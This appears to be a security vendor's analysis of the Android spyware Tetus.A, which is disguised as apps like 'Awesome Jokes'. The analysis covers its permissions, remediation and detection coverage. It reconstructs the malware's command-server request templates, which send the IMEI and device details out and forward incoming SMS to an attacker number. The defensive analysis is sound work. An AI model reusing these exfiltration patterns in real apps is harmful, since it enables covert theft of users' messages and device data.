Android/Tetus.A!tr.spy

description-logoAnalysis

Android/Tetus.A!tr.spy is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as legitimate applications such as 'Awesome Jokes', 'Celeb Stalker' etc. The malware silently forwards all incoming SMS messages to the attacker's server and it also tracks installation of other related applications.


Technical Details


The piece of malware and comes in the packages such as "com.droidmojo.awesomejokes", "com.droidmojo.celebstalker", "com.appengines.fastphone" etc. (ref Fig1, 2 and 3)

Fig1 : Awesome Jokes application icon

Fig2 : Celeb Stalker application icon

Fig3 : Faster Phone application icon
When launched, the application shows a screen corresponding to the application it claims to be.
Once the application page is loaded, the malware registers with a remote website by sending an HTTP request is sent to
[PKG_URL]/ip.php?market=1&lpn=300&pid=[PID]
 &pm=[Build.MODEL]&vd=[Build.MANUFACTURER]
 &c=[NETWORK_CARRIER]&imei=[IMEI]&firmware=[FIRMWARE_VERSION]
 &sdk=[SDK_NUMBER]&sid=[SID]&cc=[NETWORK_OPERATOR_NAME]
where PKG_URL varies with the application eg : hxxp://[REMOVED].droidmojo.net, hxxp://[REMOVED]-finity.net, hxxp://[REMOVED]-engines.com.
The server responds with several parameters contained in a JSON object which are used, in particular, to send SMS messages.
Next, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] "&pid=" 
 + [PID] + "&type=message&log=" + [STR]
where
  • IMEI = infected phone's IMEI
  • PID = obtained from the package resources
  • STR = [keyword] ?ucsa=[ucsa]

Then, an SMS is sent to a number [csc] with the content
[keyword] ?ucsa=[ucsa]
where csc, keyword and ucsa are obtained from the JSON response.
Finally, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] "&pid=" + [PID] 
+ "&type=sms&log=" + [STR]
where
  • IMEI = infected phone's IMEI
  • PID = obtained from the package resources
  • STR = "Unknown", "SMS_sent", "Generic_failure", "No_service", "Null_PDU" or "Radio_off" ; depending upon the result of SMS sending

Besides HTTP requests, the malware implements a SMS receiver that forwards the message body of incoming SMS messages to the number [csc].
Whenever a new related application is installed, a request containing the list of related installed applications is sent to the attacker's server at
http://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID] + "&type=marketreciever&log=" + [INSTALLED_APPS]
A "related" application is one of those applications:
  • com.droidmojo.awesomejokes
  • com.droidmojo.celebstalker
  • com.appengines.fastphone

Permissions required by the application:
  • INTERNET
  • ACCESS_NETWORK_STATE
  • SEND_SMS
  • READ_PHONE_STATE

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
Extended
FortiClient
Extreme
FortiAPS
FortiAPU
FortiMail
Extreme
FortiSandbox
Extreme
FortiWeb
Extreme
Web Application Firewall
Extreme
FortiIsolator
Extreme
FortiDeceptor
Extreme
FortiEDR